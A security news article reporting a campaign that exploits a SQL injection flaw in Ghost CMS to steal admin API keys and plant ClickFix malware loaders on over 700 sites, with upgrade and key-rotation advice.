Exploiting a Critical Vulnerability
A widespread cyber attack is leveraging a critical SQL injection vulnerability in the Ghost CMS platform to inject malicious JavaScript code onto websites. The campaign, identified by researchers at Chinese cybersecurity firm Qianxin’s XLab, has impacted over 700 domains. Compromised sites include prominent university portals, media outlets, AI and SaaS companies, fintech platforms, and security blogs, with specific breaches reported at Harvard University, Oxford University, Auburn University, and DuckDuckGo.
The vulnerability affects Ghost CMS versions from 3.24.0 through 6.19.0. It allows unauthenticated attackers to read arbitrary data from the website database, including admin API keys. These keys grant full management access to users, articles, and themes, enabling attackers to modify content. While a fix was released on February 19 in version 6.19.1, many site administrators have failed to apply the security update, leaving their systems exposed.
How the Attack Chain Works
The attack begins by exploiting the SQL injection flaw to steal admin API keys. Attackers then use these elevated privileges to inject a lightweight JavaScript loader into article pages. This loader fetches second stage code from the attacker’s infrastructure, which acts as a cloaking script to fingerprint visitors and identify valid targets.
Visitors who pass the verification are presented with a fake Cloudflare verification prompt loaded via an iframe. This prompt uses a ClickFix lure, instructing victims to prove they are human by pasting a provided command into their Windows command prompt. Executing the command drops a payload onto the victim’s system. Researchers have observed multiple payload types in these attacks, including DLL loaders, JavaScript droppers, and an Electron based malware sample identified as UtilifySetup.exe. At least two distinct activity clusters have been targeting vulnerable Ghost sites, with attackers sometimes cleaning the scripts of rivals to inject their own, or re-infecting the same domains after cleanup.
Protection and Mitigation
The primary recommendation for Ghost CMS administrators is to upgrade to version 6.19.1 or later immediately. All previously used API keys should be rotated, as they may have been compromised. A thorough review of websites is necessary to locate and remove any injected scripts. XLab has provided a list of indicators of compromise to assist with this process. Additionally, maintaining a 30 day record of admin API call logs is advised to enable reliable retrospective investigations.
Source: BleepingComputer
